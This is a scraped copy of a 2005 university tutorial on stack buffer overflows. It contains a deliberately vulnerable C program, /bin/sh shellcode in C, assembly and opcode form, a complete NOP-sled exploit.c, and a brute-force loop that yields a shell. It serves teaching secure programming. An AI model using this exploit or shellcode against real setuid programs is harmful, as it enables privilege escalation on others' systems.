0% found this document useful (0 votes)

72 views13 pages

Tutorial: Buffer Overflows: Patrick Schaller December 6, 2005

Uploaded by

Amad Junaid

We take content rights seriously. If you suspect this is your content, claim it here.

Available Formats

Download as PDF, TXT or read online on Scribd

0% found this document useful (0 votes)

72 views13 pages

Tutorial: Buffer Overflows: Patrick Schaller December 6, 2005

Uploaded by

Amad Junaid

We take content rights seriously. If you suspect this is your content, claim it here.

Available Formats

Download as PDF, TXT or read online on Scribd

You are on page 1/ 13

Tutorial: Buffer Overflows

Patrick Schaller
December 6, 2005

Parts of this document, especially parts of the code example, are taken
from a semester thesis written in the information security department about
“Sicherheitsrelevante Programmierfehler verstehen und vermeiden” by Philippe
Lovis

1
Remarks:
Legal Notice:
This document is for educational use only. It is created for the use in the lecture
Security Engineering and is not allowed to be published on a public accessible
server in the Internet. The techniques described in this document can be abused
for criminal purposes. We clearly discourage the reader from using the infor-
mation gained from this document for criminal purposes. The goal behind the
document is to show possible sources of security related problems in software
development and our intent is that the document helps to increase the security
level of future software.

Technical Notes:
The code in this tutorial is written on a Linux system and will not be executable
on a Windows system in this form. Remarks on the the memory layout refer to
Intel processors of the x86 family (so does assembly and machine code).
For compilation of the source code in this tutorial use gcc-2.95, because later
version do an optimization for the memory layout, which does not exactly cor-
respond to the explanations below.
The code can be found in the file code.tar, where you will find a README
file with explanations about the execution (described also in this document).
The execution of the code on a normal Linux system should safe and will not
damage anything on the system if the reader follows the instruction given in
this document.
Important: Before you execute the code, set the limit for the size of core

files to zero, because every failed attempt to access memory regions outside the
region assigned to the process would generate a core-file and consume a lot of
space.
In a bash-shell this limit can be checked with the command ulimit -a and the
core-file size can be set to zero with ulimit -c 0.

Background:
In this section we will repeat the necessary background. For details see lecture
notes on the topic or find the information in the Internet.

First of all we have to know executable files are created and how the memory
structure of such an executable file looks like:
The source code written in C is translated by the compiler into ELF-format
(Executable and Linkable Format). The three most important parts are (see

2
also figure 1: Memory Layout of a Process):

• Text segment: (.text) The instructions are contained in this segment.

Only read access is permitted.

• Data segment: Contains .data and .bss, where .data contains global
variables, their value is known at compile time (e.g., int i = 5;). In .bss
uninitialized global variables will be located (e.g., int i;).

• Stack: In this segment all the dynamic variables get their space and are
removed when the subroutine returns. This includes all variables defined
in procedures that are not declared as static variables.

0xBFFFFFFF
env, argv, argc

STACK

HEAP

.bss

.data

.text

shared libraries
0x80000000

Figure 1: Memory Layout of a Process

If a procedure is called within the process a so called Stackframe is cre-

ated on the stack of the calling process. This stackframe is created when the
procedure is called and is removed from the stack as soon as the procedure has
finished. The stackframe contains the local variables of the procedure and all
information needed to restore the previous stackframe (e.g., the one of the call-
ing procedure).
We will now examine the memory of our example:

If we compile the code (see figure 2: Source Code overflowexample.c) with

the command gcc-2.95 -g overflowexample.c -o overflowexample we can

3
#include <stdio.h>

void proc(char* str, int a, int b)

{
char buf[50];
strcpy(buf, str);
}

int main(int argc, char* argv[])

{
if(argc > 1)
proc(argv[1], 1, 2);

printf("%s\n", argv[1]);
return 0;
}

Figure 2: Source Code overflowexample.c

examine the memory layout using the debugger gdb (see figure 3: gdb output).

We are especially interested in how the stackframe created for the procedure
proc looks like. Because this procedure contains the vulnerable code, we will
examine it in detail.
In the output of gdb the last five lines show the places, where the compiler
placed the variables (command: info scope proc).
As you can see in the picture (figure 4: Stackframe of proc), first the vari-
ables a and b are placed on the stack (in reverse order), then a pointer to the
address of argv[1]. Next the return address RET is put on the stack, so the
process knows at which address to continue (find the next instruction) after the
procedure has finished. Furthermore the “old” basepointer ebp is saved in the
stackframe. The next addresses are reserved for the local variable buf.

Simple Buffer Overflow

As you can see in our example code, we use the procedure strcp in proc to
copy the content of argv[1] (the first argument given to the program) into
the array buf[50]. As you may already know strcp does not control the in-
put. So it copies whatever it gets into buf[50], no matter how long the string
argv[1] may be. The only limitation is the memory region assigned to the

4
gdb overflowexample
GNU gdb 6.3-debian
Copyright 2004 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i386-linux"...Using host libthread_db library "/lib/tls/libthread_db.so.1".

(gdb) run Hello

Starting program: /home/schapatr/programming/c/overflowexample Hello
Hello

Program exited normally.

(gdb) info scope proc
Scope for proc:
Symbol str is an argument at stack/frame offset 8, length 4.
Symbol a is an argument at stack/frame offset 12, length 4.
Symbol b is an argument at stack/frame offset 16, length 4.
Symbol buf is a local variable at frame offset -52, length 50.
(gdb)

Figure 3: gdb output

high addresses

ebp+16 2

ebp+12 1

ebp+8 argv[1]

ebp+4 RET

ebp saved ebg

buf[....,49] void proc(char* str, int a, int b)

{
char buf[50];
strcpy(buf, str);
}

ebp-52 buf[0,..,3]

low addresses

Figure 4: stackframe of proc

process (overflowexample).
If we enter a string longer than 50 bytes, memory not assigned to the local array
buf will be overwritten. As we see in the diagram stackframe above, next would

5
be ebp and after it the return address to be overwritten.
In the listening shown in figure 5 (Overflow), you can see the result of entering
80 times the string A into the buffer buf:

(gdb) run ‘perl -e "print ’A’x80"‘

Starting program: /home/schapatr/programming/c/overflow ‘perl -e "print ’A’x80"‘

Program received signal SIGSEGV, Segmentation fault.

0x41414141 in ?? ()
(gdb)

Figure 5: Overflow

In this listing the little perl part produces 80 A’s to be given as argv[1] to
our example program. As we saw before the space space assigned to the array
buf (in the stackframe of proc) is too small for the 80 bytes, so the next ad-
dresses will be overwritten. In the output of gdb we see, that the program did
not exit normally, instead the program got the signal SIGSEV, which indicates
a segmentation fault.
This shows, that our program tried to access memory outside of the space as-
signed to it. With the help of gdb we can now examine the registers of our
process and we find (see figure 6 eip register entry), that the instruction pointer
eip is set to 0x41414141.

(gdb) info register eip

eip 0x41414141 0x41414141
(gdb)

Figure 6: eip register entry

The reason for this can be explained with help of the diagram showing the
layout of the stackframe created for proc. First of all the space for buf was
to small for the input. Because strcp does not control its input, also the next
parts of the stackframe got overwritten with A’s. The ASCII-Code for the letter
A is 0x41 and so ebp and RET got filled with it.
So the return address (RET) of the the procedure proc was set to 0x41414141.
When the procedure finished, this return address should have pointed to the
next instruction to be executed, but obviously the return address was outside
of the scope of our process and the kernel prevented our process from reading
instructions of an address range not assigned to our process, sent the signal
SIGSEV and terminated the process.

6
How could an attacker use this
What we achieved until now is not of much use. We just overwrote the re-
turn address with a value outside of the scope of the assigned memory and got
stopped by the kernel. The goal of an attacker would be to execute some code
of his choice inside of the running process.
This is done by placing the code in the region assigned to buf and by letting
the return address (ret) point to the beginning of the area where the code is
placed (see figure 7: modified stackframe).

high addresses

argv[1]

RET

CODE

CODE
CODE
CODE
CODE
CODE
CODE
CODE
CODE
CODE

CODE

low addresses

Figure 7: Modified Stackframe

Most often an attacker wants to open a shell on the target system. So he

would try to insert the code to open a shell inside the memory assigned to buf
and then would try to let the return pointer point to the starting point of his
inserted code. The code would then be executed (when the procedure would
have finished) inside the calling process and would inherit the whole process
structure (pid, uid,...). This is also the reason why programs whose owner is
root and where the setuid-bit is set are very critical, because the inserted code
would then be executed with the uid set to root, so the attacker would get a
root-shell. This implies, that the attacker would get full control of the target
machine.

7
In our example we will also try to open a shell, the code for the program to
open a shell could look like in the figure 8: shellcode.c.

#include <stdio.h>

int main()
{
char* name[2];
name[0]="/bin/sh";
name[1]=NULL;
execve(name[0], name, NULL);
return 0;
}

Figure 8: shellcode.c

This code should then be written in an executable format into the buffer
(buf[50]). So we have to translate it into machine code. This step will not be
given in full detail, the main steps are:

• compile the code with the static option, so it’s not bound into a dynamic
library
• with objdump the assembly code of the executable can be analyzed
• the Null-bytes have to be transformed away, because strcp would stop
execution, when it sees the first Null-Byte (string end)
After completing the steps just described, we get the following assembler
code (see figure9: shellcodeasm.c).

If we compile the code above we can again analyze it with the help of objdump
(e.g., objdump -d shellcodasm | grep \<main\>: -A 20) to find the op-
codes.
The opcodes we need are shown in the following C program (see figure 10: shell-
codeopcode.c), which can be compiled and executed to check the correctness of
the code.

Because the character array shellcode[] contains machine code we can just
set a pointer for the function fp to point to the beginning of the array and the
code will be executed.

8
int main()
{
__asm__(
"xor %eax, %eax\n" // eax = NULL
"push %eax\n" // terminate string with NULL
"push $0x68732f2f\n" // //sh (little endian)
"push $0x6e69622f\n" // /bin (little endian)
"mov %esp, %ebx\n" // pointer to /bin//sh in ebx
"push %eax\n" // create array for argv[]
"push %ebx\n" // pointer to /bin//sh in argv
"mov %esp, %ecx\n" // pointer to argv[] in ecx
"mov %eax, %edx\n" // NULL (envp[]) in edx
"movb $0xb, %al\n" // 11 = execve syscall in eax
"int $0x80\n" // soft interrupt
);
}

Figure 9: shellcodeasm.c

Putting it all together

So far we have a vulnerable program (overflowexample.c) and the machine
code for the program we want to be executed. We now have to write a so called
exploit that will inject the machine code into the buffer (buf) of our vulnerable
program and will insert the correct return address into the field RET of the
stackframe. This is the most difficult part because we cannot know in advance,
which starting address will be assigned to the array buf.
We will follow the method mentioned in the paper “Smashing The Stack For
Fun And Profit” written by Aleph One. The next figure (figure 11: Aleph One
Method) will explain the idea behind the method:
In the diagram you see on the left side the relative addresses of the stack-
frame, on the right the former targets of the old pointers (compare the figure
stackframe of proc).
The ideas behind this method are the following:
• fill the first part of the buffer (buf) with nop-instructions, this increases
the probability, that our estimated return pointer points to one of the
fields, where execution of our shellcode will start (compare the landing
zone mentioned in the lecture notes)
• place the machine code we want to be executed just behind the fields of
nop-instructions
• fill the rest with the estimated return address, so if proc has finished and

9
char shellcode[] =
"\x31\xc0"
"\x50"
"\x68\x2f\x2f\x73\x68"
"\x68\x2f\x62\x69\x6e"
"\x89\xe3"
"\x50"
"\x53"
"\x89\xe1"
"\x89\xc2"
"\xb0\x0b"
"\xcd\x80";

int main()
{
void (*fp)() = shellcode;
fp();
return 0;
}

Figure 10: shellcodeopcode.c

should get the return address for the instruction pointer the return pointer
will point to the starting address of the machine code (or to one of the
nop-instructions)
The code for our exploit could look like the code listed in figure 12: exploit.c.

This program has the input offset where we have to estimate the relative
position (to the stackpointer esp) of the machine code we filled into buf. Our
estimated return address is then calculated and saved in the variable ret. At
the end of the program the vulnerable code (overflowexample) is executed. No-
tice that execve overwrites the context of the calling process.
In the code you should notice the function get esp(). This function will re-
turn the address of the stack pointer (esp) of our process (exploit). Because the
vulnerable program will later be executed in the context of our process exploit,
the address of esp will serve as an approximation for the location of the return
address (RET), where the code to open the shell should be located.

To finally execute the buffer overflow we will use a kind of brute force method.
Because we don’t know the return address in advance we will simply run our
exploit program with many inputs and hope that on of them will point to the
part of the memory where our machine code (or the nop-instructions) is located.

10
high addresses

ebp+16 estimated RET

ebp+12 estimated RET

ebp+8 estimated RET argv[1]

ebp+4 estimated RET RET

ebp estimated RET

estimated RET

estimated RET
estimated RET

machine code
for execution of
/bin/shell

nop

nop
ebp-52

low addresses

Figure 11: Aleph One Method

So to finally mount the attack you have to enter the following command line
in a bourne-shell:
for i in $(seq 0 20 4000) ;do echo $i; ./exploit $i; done

The output will then be something like:

0
Segmentation fault
20
Segmentation fault
40
Segmentation fault
..
..
..
1040
Illegal instruction
1060
Illegal instruction
1080
sh-2.05b$

11
As you can see in the first tries we reached a memory location that is not in
the memory space of our process (Segmentation fault), then we reached some
memory in the space of the process, but couldn’t find an allowed instruction
(Illegal Instruction) and finally at offset 1080 our shellcode was executed
and we got a shell prompt.

12
#include <stdio.h>
#include <unistd.h>

#define BUF 80
#define NOP 0x90

char shellcode[] =
"\x31\xc0"
"\x50"
"\x68\x2f\x2f\x73\x68"
"\x68\x2f\x62\x69\x6e"
"\x89\xe3"
"\x50"
"\x53"
"\x89\xe1"
"\x89\xc2"
"\xb0\x0b"
"\xcd\x80";

long unsigned get_esp()

{
__asm__("mov %esp, %eax");
}

int main(int argc, char *argv[])

{
int ret, i, n;
int *bufptr;
char *arg[3], buf[BUF];

if(argc < 2){

printf("Usage: %s offset\n", argv[0]);
exit(1);
}

/estimated return address/

ret = get_esp() + atoi(argv[1]);

/fill buffer with return addresses/

bufptr = (int*)buf;
for(i=0;i<BUF; i +=4)
*bufptr++ = ret;

/fill first part of buf with nops/

for(i=0;i < 20 ; i++)
buf[i]= NOP;

/copy shellcode into buf after nops/

for(n=0;n<strlen(shellcode);n++)
buf[i++]=shellcode[n];

/set up argv for vulnerable program/

arg[0] = "./overflowexample";
arg[1] = buf;
arg[2] = NULL;

/execute vulnerable program/

execve(arg[0], arg, NULL);

return 0;
}

Figure 12: exploit.c

Buffer Overflow
No ratings yet
Buffer Overflow
37 pages
Smash The Stack
100% (1)
Smash The Stack
29 pages
3_BufOverflows
No ratings yet
3_BufOverflows
100 pages
3 Software Security
No ratings yet
3 Software Security
78 pages
3.5 Buffer Overflow, Integer and Heap Overflow
No ratings yet
3.5 Buffer Overflow, Integer and Heap Overflow
60 pages
02
No ratings yet
02
58 pages
How_to_write_Buffer_Overflows
No ratings yet
How_to_write_Buffer_Overflows
19 pages
Buffer Overflow (v3)
No ratings yet
Buffer Overflow (v3)
85 pages
6.1 Overflow1
No ratings yet
6.1 Overflow1
27 pages
IntroToROP_detailed
No ratings yet
IntroToROP_detailed
108 pages
Lecture 5 Bufferoverflow
No ratings yet
Lecture 5 Bufferoverflow
27 pages
3 Software Security-Updated
No ratings yet
3 Software Security-Updated
79 pages
Report
No ratings yet
Report
4 pages
C Vulnerabilities Slides
No ratings yet
C Vulnerabilities Slides
12 pages
Chapter 3 - Software Security
No ratings yet
Chapter 3 - Software Security
31 pages
Buffer Overflows Complete
No ratings yet
Buffer Overflows Complete
49 pages
CS 475: Lecture 3 Software Vulnerabilities: Rachel Greenstadt April 14, 2015
No ratings yet
CS 475: Lecture 3 Software Vulnerabilities: Rachel Greenstadt April 14, 2015
42 pages
07 Kamil Sarac Secure Coding C CPlusPlus
No ratings yet
07 Kamil Sarac Secure Coding C CPlusPlus
35 pages
4 MemoryCorruption
No ratings yet
4 MemoryCorruption
55 pages
4. Buffer Overflow
No ratings yet
4. Buffer Overflow
39 pages
2 MemoryCorruption
No ratings yet
2 MemoryCorruption
77 pages
09-machine-advanced
No ratings yet
09-machine-advanced
42 pages
CSC437 Fall2013 Module 5 Buffer Overflow Attacks
No ratings yet
CSC437 Fall2013 Module 5 Buffer Overflow Attacks
42 pages
Week 5b
No ratings yet
Week 5b
53 pages
06 Buffoverflow
No ratings yet
06 Buffoverflow
21 pages
Class11 cs230s23
No ratings yet
Class11 cs230s23
33 pages
Locating the Address of Local Variables
No ratings yet
Locating the Address of Local Variables
4 pages
Csce5560 - CommonThreats 8
No ratings yet
Csce5560 - CommonThreats 8
98 pages
CEH v5 Module 20 Buffer Overflow
No ratings yet
CEH v5 Module 20 Buffer Overflow
36 pages
Buffer Overflow: Modified From Slides of Lawrie Brown
No ratings yet
Buffer Overflow: Modified From Slides of Lawrie Brown
38 pages
L4P3 Stack Overflow
No ratings yet
L4P3 Stack Overflow
31 pages
Lecture Slides Tutorials Buffoverflow
No ratings yet
Lecture Slides Tutorials Buffoverflow
18 pages
ch10-2025
No ratings yet
ch10-2025
42 pages
INE Exploit Development Buffer Overflows Course File (3)
No ratings yet
INE Exploit Development Buffer Overflows Course File (3)
56 pages
Buffer
No ratings yet
Buffer
78 pages
Remote BOF Explanation
No ratings yet
Remote BOF Explanation
11 pages
Low Level Exploits
100% (4)
Low Level Exploits
66 pages
BOF en
No ratings yet
BOF en
86 pages
Buffer Overflows: Erik Poll
No ratings yet
Buffer Overflows: Erik Poll
61 pages
Buffer Overflow Exploits: Taken Shamelessly From: /courses/cse451/05sp/section/ove Rflow1
No ratings yet
Buffer Overflow Exploits: Taken Shamelessly From: /courses/cse451/05sp/section/ove Rflow1
27 pages
Lecture1-51-101
No ratings yet
Lecture1-51-101
51 pages
Source Code Security: I. II. I. II. Iii. IV. V. VI. Vii. Viii. IX. X
No ratings yet
Source Code Security: I. II. I. II. Iii. IV. V. VI. Vii. Viii. IX. X
51 pages
06 Software Security 3
No ratings yet
06 Software Security 3
41 pages
CH 11
No ratings yet
CH 11
36 pages
Buffer Overflow Part 1
No ratings yet
Buffer Overflow Part 1
30 pages
Computer Systems Security CS 628A: Pramod Subramanyan Indian Institute of Technology Kanpur
No ratings yet
Computer Systems Security CS 628A: Pramod Subramanyan Indian Institute of Technology Kanpur
66 pages
David Wagner CS 161 Computer Security Notes
No ratings yet
David Wagner CS 161 Computer Security Notes
14 pages
Ret 2 Win
No ratings yet
Ret 2 Win
18 pages
BufferOverflow
No ratings yet
BufferOverflow
23 pages
Buffer Overflow
No ratings yet
Buffer Overflow
24 pages
Exploits and Exploit Development: The Basics
No ratings yet
Exploits and Exploit Development: The Basics
37 pages
Yan Cai Yc8566 Proj1
No ratings yet
Yan Cai Yc8566 Proj1
8 pages
1 An Exploit Example, A Buffer Overflow
100% (1)
1 An Exploit Example, A Buffer Overflow
10 pages
Module-1 1
No ratings yet
Module-1 1
23 pages
Book Sample Buffer
No ratings yet
Book Sample Buffer
70 pages
Week8 M
No ratings yet
Week8 M
16 pages
Buffer Overflow Attacks On Linux Principles Analyzing and Protection
No ratings yet
Buffer Overflow Attacks On Linux Principles Analyzing and Protection
5 pages
Control Hijacking (Lecture - 4)
100% (1)
Control Hijacking (Lecture - 4)
35 pages
Oracle Certified Professional Java Programmer OCPJP 1Z0 809
From Everand
Oracle Certified Professional Java Programmer OCPJP 1Z0 809
Manish Soni
No ratings yet
UNIX Shell Programming Interview Questions You'll Most Likely Be Asked
From Everand
UNIX Shell Programming Interview Questions You'll Most Likely Be Asked
Vibrant Publishers
No ratings yet

Tutorial: Buffer Overflows: Patrick Schaller December 6, 2005

Uploaded by

Tutorial: Buffer Overflows: Patrick Schaller December 6, 2005

Uploaded by

Tutorial: Buffer Overflows

• Text segment: (.text) The instructions are contained in this segment.

Figure 1: Memory Layout of a Process

If a procedure is called within the process a so called Stackframe is cre-

If we compile the code (see figure 2: Source Code overflowexample.c) with

void proc(char* str, int a, int b)

int main(int argc, char* argv[])

Figure 2: Source Code overflowexample.c

Simple Buffer Overflow

(gdb) run Hello

Program exited normally.

Figure 3: gdb output

ebp saved ebg

buf[....,49] void proc(char* str, int a, int b)

Figure 4: stackframe of proc

(gdb) run ‘perl -e "print ’A’x80"‘

Program received signal SIGSEGV, Segmentation fault.

(gdb) info register eip

Figure 6: eip register entry

Figure 7: Modified Stackframe

Most often an attacker wants to open a shell on the target system. So he

Putting it all together

Figure 10: shellcodeopcode.c

ebp+16 estimated RET

ebp+12 estimated RET

ebp+8 estimated RET argv[1]

ebp+4 estimated RET RET

ebp estimated RET

Figure 11: Aleph One Method

The output will then be something like:

long unsigned get_esp()

int main(int argc, char *argv[])

if(argc < 2){

/*estimated return address*/

/*fill buffer with return addresses*/

/*fill first part of buf with nops*/

/*copy shellcode into buf after nops*/

/*set up argv for vulnerable program*/

/*execute vulnerable program*/

Figure 12: exploit.c

You might also like

/estimated return address/

/fill buffer with return addresses/

/fill first part of buf with nops/

/copy shellcode into buf after nops/

/set up argv for vulnerable program/

/execute vulnerable program/